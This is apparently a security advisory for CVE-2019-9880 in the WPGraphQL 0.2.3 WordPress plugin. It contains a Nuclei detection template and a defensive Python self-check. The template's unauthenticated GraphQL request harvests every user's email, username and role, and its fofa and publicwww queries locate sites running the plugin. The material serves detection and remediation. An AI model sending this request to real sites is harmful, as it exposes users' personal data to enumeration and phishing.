CVE-2019-9880: WPEngine WPGraphQL 0.2.3 - Unauthenticated User Information Disclosure

Date: 2025-08-01 | Affected software: WPEngine WPGraphQL | PoC: public

Vulnerability description

An issue was discovered in the WPGraphQL 0.2.3 plugin for WordPress. By querying the 'users' RootQuery, an unauthenticated attacker can retrieve every WordPress user's details, such as email address, role, and username.

PoC code [public]

id: CVE-2019-9880

info:
  name: WPEngine WPGraphQL 0.2.3 - Unauthenticated User Information Disclosure
  author: intelligent-ears
  severity: critical
  description: |
    An issue was discovered in the WPGraphQL 0.2.3 plugin for WordPress. By querying the 'users' RootQuery, it is possible, for an unauthenticated attacker, to retrieve all WordPress users details such as email address, role, and username.
  impact: |
    An attacker can exploit this vulnerability to enumerate all WordPress users and extract sensitive information including email addresses, usernames, and user roles without authentication.
  remediation: |
    Update WPGraphQL to version 0.3.0 or later to fix this vulnerability.
  reference:
    - http://packetstormsecurity.com/files/153025/WordPress-WPGraphQL-0.2.3-Authentication-Bypass-Information-Disclosure.html
    - https://github.com/pentestpartners/snippets/blob/master/wp-graphql0.2.3_exploit.py
    - https://github.com/wp-graphql/wp-graphql/releases/tag/v0.3.0
    - https://www.pentestpartners.com/security-blog/pwning-wordpress-graphql/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2019-9880
    cwe-id: CWE-306
    epss-score: 0.48585
    epss-percentile: 0.97684
    cpe: cpe:2.3:a:wpengine:wpgraphql:0.2.3:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wpengine
    product: wpgraphql
    framework: wordpress
    fofa-query: body="/wp-content/plugins/wp-graphql/"
    publicwww-query: "/wp-content/plugins/wp-graphql/"
  tags: cve,cve2019,wp,wp-plugin,wordpress,wp-graphql,wpengine,unauth,info-leak

http:
  - raw:
      - |
        POST /graphql HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"query": "query { users { nodes { id name email username roles } } }"}

    matchers:
      - type: dsl
        dsl:
          - contains_all(body, "{\"data\":{", "\"name\":", "\"roles\":")
          - contains(content_type, "application/json")
          - status_code == 200
        condition: and

    extractors:
      - type: json
        name: user-data
        json:
          - '.data.users.nodes[] | "username: " + .username + ", email: " + .email'
# digest: 490a00463044022036c5a5b8d8f866805a08535ce3877e72abdf7e2bab3ac523af862f62baff6cc102205f25fa66c75cccc7b29e080bf5ecb09e902cc6d77466eccd1bf4c00d8f5a4d59:922c64590222798bb761d5b6d8e72950
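As an added example (not part of this advisory or the Nuclei template), the following Python self-check lets a site owner confirm whether an unauthenticated response from their own /graphql endpoint actually discloses account data. It re-implements the template's three DSL matcher conditions and its json extractor, but the extractor-style check inspects field values rather than key names, which matters because the string matcher also fires on a response where `email`, `username` and `roles` come back as null. The two response bodies are constructed samples, and the null-field shape of a non-leaking response is an assumption.

```python
import json

# Fields the advisory says the 'users' RootQuery exposed to unauthenticated callers.
SENSITIVE_FIELDS = ("email", "username", "roles")

# Constructed sample of a leaking response (not captured from a real site).
VULNERABLE_RESPONSE = (
    '{"data":{"users":{"nodes":['
    '{"id":"dXNlcjox","name":"admin","email":"admin@example.com",'
    '"username":"admin","roles":["administrator"]},'
    '{"id":"dXNlcjoy","name":"editor","email":"ed@example.com",'
    '"username":"editor","roles":["editor"]}]}}}'
)
# Assumed shape of a non-leaking response: the keys are present but null.
NULLED_RESPONSE = (
    '{"data":{"users":{"nodes":['
    '{"id":"dXNlcjox","name":"admin","email":null,"username":null,"roles":null}]}}}'
)

def matcher_hits(body: str, content_type: str, status_code: int) -> bool:
    """The template's three DSL matcher conditions, combined with AND."""
    needles = ('{"data":{', '"name":', '"roles":')
    return (all(n in body for n in needles)
            and "application/json" in content_type
            and status_code == 200)

def leaked_accounts(body: str) -> list:
    """One record per user node carrying a non-empty sensitive value.
    Mirrors the template's json extractor but checks values, not key names."""
    try:
        doc = json.loads(body)
    except json.JSONDecodeError:
        return []
    nodes = ((doc.get("data") or {}).get("users") or {}).get("nodes") or []
    found = []
    for node in nodes:
        if not isinstance(node, dict):
            continue
        exposed = {f: node[f] for f in SENSITIVE_FIELDS if node.get(f) not in (None, "", [])}
        if exposed:
            found.append({"name": node.get("name"), **exposed})
    return found

def assess(body: str, content_type: str = "application/json", status_code: int = 200) -> dict:
    """Combine both checks; 'affected' is only true when real values leak."""
    leaked = leaked_accounts(body)
    return {"matcher": matcher_hits(body, content_type, status_code),
            "leaked": leaked, "affected": bool(leaked)}

if __name__ == "__main__":
    for label, resp in (("vulnerable", VULNERABLE_RESPONSE), ("nulled", NULLED_RESPONSE)):
        print(label, json.dumps(assess(resp), indent=1))
```

Feed `assess()` the body, Content-Type and status of a response captured from your own instance; treat `affected` as the verdict and `matcher` only as the template's looser signal.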
